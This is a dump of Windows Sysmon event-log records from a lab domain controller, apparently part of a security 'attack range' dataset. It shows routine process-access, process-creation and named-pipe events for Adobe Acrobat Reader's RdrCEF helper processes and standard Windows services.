12:30:10.744{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+1136f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+2465|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa1bc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+57948e5(wow64) 154100x800000000000000046889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.758{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000046888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.744{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.713{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.713{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.16728433495597699961C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.713{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.16728433495597699961C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000046883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.697{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.5496228322731815889C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.697{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.5496228322731815889C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000046881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.697{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.12213012606062939588C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.697{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.12213012606062939588C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.697{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000046878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.697{FE4C2B44-E650-63C7-8906-00000000AF02}3796\com.adobe.reader.rna.administrator.DC.0C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.697{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.697{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.697{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.682{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.594{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.594{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.529{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.6664045945630765711C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.529{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.6664045945630765711C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-E650-63C7-8906-00000000AF02}37963120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+1136f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe+2465|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+32aa1bc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+f3c9d6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+17a4c0e(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+13618b7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d01d85(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c56e7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c53b6(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+45c50f1(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+5794b9d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+57948e5(wow64) 154100x800000000000000046863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.538{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/22.3.20310 Chrome/105.0.0.0" --lang=en-US 